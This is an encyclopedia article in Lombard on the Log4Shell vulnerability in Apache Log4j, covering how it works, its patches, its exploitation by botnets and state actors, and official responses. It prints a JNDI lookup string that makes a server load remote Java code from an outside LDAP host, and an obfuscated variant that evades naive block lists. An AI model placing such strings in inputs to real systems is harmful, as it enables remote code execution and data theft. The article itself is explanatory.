Log4Shell
Quest articol chì l'è scrivud in lombard, con la Noeuva Ortografia Lombarda |
Log4Shell (CVE-2021-44228) a l'è una vulnerabilità zero-day che la permet l'esecuzzion de codes arbitrari de remot a travers del popolar framework Java Log4j, nonziada del team de sigurezza de Alibaba a Apache el 24 de november 2021 e nonziada in publegh el 9 de dicember 2021, in principi doperada soratut per tacà i server de Minecraft.
Determinada de 'na valutazzion impropria de 'n input minga fidad in del cas di supleghe LDAP e JNDI quand che gh'è un lookup, l'è stada ciamada "la vulnerabilità la pussee critega de la decade passada" e l'ha ricevud on pontegg de gravità CVSS de 10, o ben el pussee volt.
La permet, grazzia al JNDI, de eseguì di programa a scerna de l'atacant in su 'n sistema remot, e l'è donca possibel installà di malware, di ransomware o di programa spia, ma a l'è anca possibel doperàlla domà per robà di informazzion reservade del computer.
Comportament
[Modifega | modifica 'l sorgent]El procotoll Java Naming and Directory Interface el permet de andà a vidé un ogett Java remot a dàgh el so path, e po fàll a travers de vari protocoll, in tra de lor gh'è anca Lightweight Directory Access Protocol, che l'è un protocoll generich per recuverà informazzion in su la red.
In la soa configurazzion de default Log4J 2 el fa la sostituzzion di stringhe quand che gh'è una strutura compagna de ${prefix:name}
: per esempi Text: ${java:version}
el po deventà Text: Java version 1.7.0_67
. In tra i espression recognossude gh'è ${jndi:<lookup>}
e se se specifega un URL in formad LDAP a l'è possibel catà foeura un URL arbitrari che 'l cargarà un ogett Java e che 'l sarà eseguid. Per esempi, se se cata foeura ${jndi:ldap://example.com/file}
el sarà caregad quell file 'me eseguibel Java.
Anca se 'l caregà 'me eseguibel a l'è minga ativ, un atacant a l'è bon de robà di informazzion reservade che poden vesser lensgiude de l'aplicazzion - compagn de 'na variabel d'ambient, e passài 'me parameter a 'n URL controllad de l'atacant che 'l po salvà i informazzion che riven.
Oltra a LDAP se poden doperà 'me vetor de atach LDAPS, o ben la soa version segura, Java remote method invocation, el Domain Name System e 'l General Inter-ORB Protocol.
Desgià che i supleghe HTTP a inn despess logade, una manera assee comun de doperà 'sto exploit a l'è de meter la stringa malevola in vun di header HTTP doperad de solet.
Mitigazzion
[Modifega | modifica 'l sorgent]El 6 de dicember 2021, trii dì prima che 'l boeugg de programazzion el vegniss publegh, a l'è stada dada foeura una patch che la sistemava el problema, e la gh'haveva dent una limitazzion in sui protocoi che se podeven doperà per fà i lookup, oltra ai server. Anca grazzia a 'sta patch a l'è stada descoverta 'na noeuva vulnerabilità, la CVE-2021-45046, che l'era bona de fà vegnì un Denial of Service in d'una quai configurazzion minga standard, e gh'è stada 'na patch anca per quell problema li.
Prima che la ghe fuss una patch, o per i sistema che poden vesser no atualizad, a l'è consiliad de toeu via del classpath org.apache.logging.log4j.core.lookup.JndiLookup
, menter prima se dava el consili de meter el parameter de sistema log4j2.formatMsgNoLookups
a false
, inscì de blocà i lookup, ma a l'era minga assee per la segonda vulnerabilità, che però a bon cunt a l'è no inscì granda 'me ris'c de sigurezza.
I prim proeuve naive de mitigazzion revardaven el bloch di stringhe a ris'c, compagn de ${jndi
, che però podeven vesser gabolade cont un poo de sistema, compagn del fà rivà el nom complet de la fonzion cont un'oltra fonzion, ad esempi ${${lower:j}ndi
, che prima el cata foeura el minuscol de j
e poeu el va adree a la suplega.
Anca el Java Runtime Environment, in di noeuve version, el bloca la possibilità de eseguì codes caregad de remot, ma ghe poden vesser di alter vetor in di alter toch de codes.
Doperà
[Modifega | modifica 'l sorgent]L'esecuzzion de codes remota l'è stada doperada per ciapà el controll de 'n quaj dispositiv vulnerabel, inscì de minà criptomonede, fà su di botnet, mandà del spam e meter di ransomware in sui sistema. I analista hann parlad de cent atach al menut, cont el 40% di red aziendai tacade in tut el mond. El s'è parlad de 'na "pandemia digital" che l'ha res'ciad de fà una fraca de dagn, anca perchè in principi se pensava che anca el pachet log4j-api el fuss vulnerabel, ma poeu el s'è descovert che l'è no inscì.
Per el CEO de Cloudflare gh'è di proeuve del doperà de l'exploit el prim de dicember, noeuv dì prima che 'l fuss cognossud in publegh, e segond GreyNoise vari computer eren dree a cercà i sistema vulnerabel.
Di botnet assee cognossude, compagn de Muhstik, Mirai, Tsunami e XMRig hann tacad a doperàll per sgiontà di computer a la soa red, e anca di ator ligad a l'Iran e a la China l'havarien doperad.
Risposta
[Modifega | modifica 'l sorgent]El diretor del Cybersecurity and Infrastructure Security Agency di Stat Unid, el Jen Easterly,, l'ha did che l'è vun di exploit pussee seri che l'ha vist, se l'è no el pussee seri, e l'ha invitad i aziende e dà la priorità a l'atualizà i sistema a ris'c.
El Center Canades de la Sigurezza Informatega l'ha ciamad di mesure imediade, e la Canada Revenue Agency e 'l governo del Quebec hann smorzad tancc di so sistema 'me mesura de sigurezza preventiva.
El Bundesamt für Sicherheit in der Informationstechnik todesch l'ha parlad de 'na "menascia propi critega" e de tancc atach in cors, tant che la situazzion l'era anca grama de capì. El Center Nazzional de Sigurezza Informatega di Pajes Bass l'ha tacad a fà 'na lista di aplicazzion a ris'c.